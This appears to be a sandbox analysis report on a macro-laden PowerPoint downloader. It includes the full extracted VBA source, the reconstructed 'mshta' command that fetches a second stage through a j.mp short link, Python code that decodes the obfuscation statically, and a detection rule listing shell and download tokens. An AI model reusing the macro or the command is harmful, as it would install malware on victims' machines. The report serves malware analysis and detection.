Verdict: MALICIOUS (Risk Score 108)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.005 Mshta
The OOXML document (a PowerPoint file; the VBA project is stored at ppt/vbaProject.bin) contains VBA macros whose entry point is the Auto_Close subroutine, so the payload runs when the presentation is closed rather than when it is opened. Both the COM ProgID and the command are assembled at runtime from string fragments spread across twelve modules using Right, Left, Mid, Replace, String and Trim: magoog + magoog1 evaluates to "WScript.Shell", which is instantiated with CreateObject (Module5), and Alive_0 then calls its Exec method with xxx + Alive_4 + Alive_5. Evaluating those three functions gives "msh" + "ta " + the URL, i.e. the reconstructed command is:

mshta https://%69%69%69%69%69%69%69%69%69%69%69%69%69%69%69%69%69%69%69%69@j.mp/asj4jsb349al2pasn3

The percent-encoded run decodes to twenty "i" characters placed in the URL's userinfo component (everything before "@" is treated as credentials, not as the host), so the request actually goes to j.mp, a Bitly short-link domain, and the second-stage location is whatever that short link resolves to. The sample is a downloader/dropper that proxies execution through mshta.exe, a signed Microsoft binary, rather than launching PowerShell directly. The remaining code (single-character functions Alive_1 to Alive_3, the unused PDF4/PDF5 assignments in xxx, and the tutorial-style RIGHT_Example subroutine in Module12) is padding that mimics benign sample code and never executes.
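To show how the command above is recovered, the following is an added example (not part of the analyzer's output and not code from the sample): it re-implements the handful of VBA string functions the macro relies on and evaluates the obfuscation chain statically in Python, using the function names and literals from the extracted macros.bas shown below, so the ProgID and the Exec argument can be confirmed without opening the document.

```python
# Added example: static evaluation of the macro's string-building chain.
# Not analyzer output and not the sample; function names and literals are
# copied from the extracted macros.bas in this report.
from urllib.parse import unquote, urlsplit


# Minimal re-implementations of the VBA string functions the macro uses.
def vba_right(s: str, n: int) -> str:
    """Right(s, n): last n characters (n = 0 gives an empty string)."""
    return s[-n:] if n > 0 else ""


def vba_left(s: str, n: int) -> str:
    """Left(s, n): first n characters."""
    return s[:n]


def vba_mid(s: str, start: int, length: int) -> str:
    """Mid(s, start, length): start is 1-based, as in VBA."""
    return s[start - 1:start - 1 + length]


def vba_string(n: int, ch: str) -> str:
    """String(n, ch): first character of ch repeated n times."""
    return ch[0] * n


def vba_trim(s: str) -> str:
    """Trim(s): strip leading and trailing spaces only."""
    return s.strip(" ")


def vba_replace(s: str, find: str, repl: str) -> str:
    """Replace(s, find, repl) with default arguments."""
    return s.replace(find, repl)


# Module2 + Module3: the ProgID handed to CreateObject.
def magoog() -> str:
    john = vba_right("Sachin sd4dssecript", 5)   # "cript"
    return "W" + vba_string(1, "S") + john        # "WScript"


def magoog1() -> str:
    return ".She" + vba_string(2, "l")            # ".Shell"


def dope_progid() -> str:
    return magoog() + magoog1()


# Module6-9 + Module11: the executable name and its trailing space.
def xxx() -> str:
    return "m" + "s" + vba_string(1, "h")         # "msh"


def alive_4() -> str:
    okk = vba_replace("3asd3asd", "3asd3asd", "t")
    return okk + "a "                              # "ta "


# Module10: the URL argument.
def alive_5() -> str:
    chicken = "@j.meat is good i love chiken"
    egg = vba_left(chicken, 3)                     # "@j."
    yeye = vba_mid("example httmxt", 9, 3)         # "htt"
    ssne = vba_trim(" asj4jsb349al2pasn3 ")
    dawg = vba_replace("Iloveluxury", "Iloveluxury", "mp")
    # VBA evaluates + before &, so egg + dawg + "/" becomes "@j.mp/" first;
    # for string operands the result equals left-to-right concatenation.
    return (yeye + "ps://%69%69%69%69%69%69%" + "69%69%69%69%69%69%6"
            + "9%69%69%69%69%69%69%69" + egg + dawg + vba_string(1, "/") + ssne)


def exec_command() -> str:
    """The string Alive_0 passes to WScript.Shell.Exec."""
    return xxx() + alive_4() + alive_5()


def decoded_url() -> str:
    """Percent-decode the URL argument to expose the userinfo trick."""
    return unquote(exec_command().split(" ", 1)[1])


def effective_host() -> str:
    """The host the request really goes to; everything before '@' is userinfo."""
    return urlsplit(decoded_url()).hostname


if __name__ == "__main__":
    print("ProgID :", dope_progid())
    print("Command:", exec_command())
    print("Decoded:", decoded_url())
    print("Host   :", effective_host())
```

Evaluating the chain this way rather than running the macro in a sandbox also avoids tripping the Auto_Close trigger, and the decoded form is what should go into a blocklist: the literal string with twenty "%69" sequences will not match a host-based indicator, while the effective host j.mp will.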
Heuristics (4)

- VBA project inside OOXML (medium, OOXML_VBA): document contains a VBA project, i.e. VBA macros are present; 3 related findings.
- CreateObject call (high, OLE_VBA_CREATEOBJ): matched line in script: `Set Dope = CreateObject(magoog + magoog1)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): matched line in script: `Public Sub Auto_Close()`
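The pairing rule described above is simple enough to reproduce. The following is an added example, not the analyzer's own rule code: it scans a byte buffer for the two token families and reports only when both are present. The real rule runs over compiled p-code and cache streams; this version works on any bytes (module source included), and the sample streams are constructed here, with SAMPLE_BOTH built from the two matched lines of this report's macros.bas.

```python
# Added example: re-creation of the OLE_VBA_PCODE_AUTOEXEC_EXEC pairing logic.
# Not the analyzer's rule implementation; sample streams are constructed.
import re

AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def find_tokens(stream: bytes, tokens) -> list:
    """Return the tokens present in the stream; VBA names are case-insensitive."""
    text = stream.decode("latin-1")   # byte-preserving decode, never raises on binary junk
    return sorted(t for t in tokens
                  if re.search(r"\b" + re.escape(t) + r"\b", text, re.IGNORECASE))


def pcode_autoexec_exec(stream: bytes) -> dict:
    """Fire only when an auto-exec entry point AND an execution token co-occur."""
    auto = find_tokens(stream, AUTOEXEC_TOKENS)
    execs = find_tokens(stream, EXEC_TOKENS)
    return {"fires": bool(auto) and bool(execs), "autoexec": auto, "exec": execs}


# Constructed stand-ins for module streams.
SAMPLE_BOTH = (b"Public Sub Auto_Close()\r\nAlive_0\r\nEnd Sub\r\n"
               b"Function Dope()\r\nSet Dope = CreateObject(magoog + magoog1)\r\nEnd Function\r\n")
SAMPLE_AUTOEXEC_ONLY = b"Sub Auto_Open()\r\nMsgBox \"hello\"\r\nEnd Sub\r\n"
SAMPLE_EXEC_ONLY = (b"Sub Helper()\r\n"
                    b"Set o = CreateObject(\"Scripting.FileSystemObject\")\r\n"
                    b"End Sub\r\n")


if __name__ == "__main__":
    for name, blob in (("both", SAMPLE_BOTH),
                       ("autoexec only", SAMPLE_AUTOEXEC_ONLY),
                       ("exec only", SAMPLE_EXEC_ONLY)):
        print(name, pcode_autoexec_exec(blob))
```

Note that on this sample the exec side of the pair is satisfied by CreateObject alone: the literal "Shell" never appears because the ProgID is built from ".She" and String(2, "l"), which is exactly why the rule is written over several token families rather than one.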
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1796 bytes | fe78a6079a210b9db4f5cce33468cca1b5950ece5a3449731ecc4f591b63edbf |
Preview of macros.bas (first 1,000 lines of the extracted script, shown exactly as decoded):

```vb
Attribute VB_Name = "Module1"
Function Alive_0()
Dope.Exec xxx + Alive_4 + Alive_5
End Function
Attribute VB_Name = "Module2"
Function magoog()
Dim John As String
John = Right("Sachin sd4dssecript", 5)
magoog = "W" & String(1, "S") + John
End Function
Attribute VB_Name = "Module3"
Function magoog1()
magoog1 = ".She" + String(2, "l")
End Function
Attribute VB_Name = "Module4"
Public Sub Auto_Close()
Alive_0
End Sub
Attribute VB_Name = "Module5"
Function Dope()
Set Dope = CreateObject(magoog + magoog1)
End Function
Attribute VB_Name = "Module6"
Function Alive_1()
Alive_1 = "m"
End Function
Attribute VB_Name = "Module7"
Function Alive_2()
Alive_2 = "s"
End Function
Attribute VB_Name = "Module8"
Function Alive_3()
Alive_3 = String(1, "h")
End Function
Attribute VB_Name = "Module9"
Function Alive_4()
Dim Okk As String
Okk = Replace("3asd3asd", "3asd3asd", "t")
Alive_4 = Okk + "a "
End Function
Attribute VB_Name = "Module10"
Function Alive_5()
Dim Yeye As String
Dim ssnd, ssne, chiken, egg, dawg As String
chicken = "@j.meat is good i love chiken"
egg = Left(chicken, 3)
Yeye = Mid("example httmxt", 9, 3)
ssnd = " asj4jsb349al2pasn3 "
ssne = Trim(ssnd)
dawg = Replace("Iloveluxury", "Iloveluxury", "mp")
Alive_5 = Yeye & "ps://%69%69%69%69%69%69%" & "69%69%69%69%69%69%6" & "9%69%69%69%69%69%69%69" & egg + dawg + String(1, "/") & ssne
End Function
Attribute VB_Name = "Module11"
Function xxx()
PDF1 = Alive_1
PDF2 = Alive_2
PDF3 = Alive_3
PDF4 = Alive_4
PDF5 = Alive_5
xxx = PDF1 + PDF2 + PDF3
End Function
Attribute VB_Name = "Module12"
Sub RIGHT_Example()
Dim John As String
John = Right("Sachin sd4dssecript", 5)
MsgBox John
End Sub
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: ppt/vbaProject.bin | 45056 bytes | a3e3f5c374d1c60ea201414195cf6c369486fb76132a94b8f644247017800790 |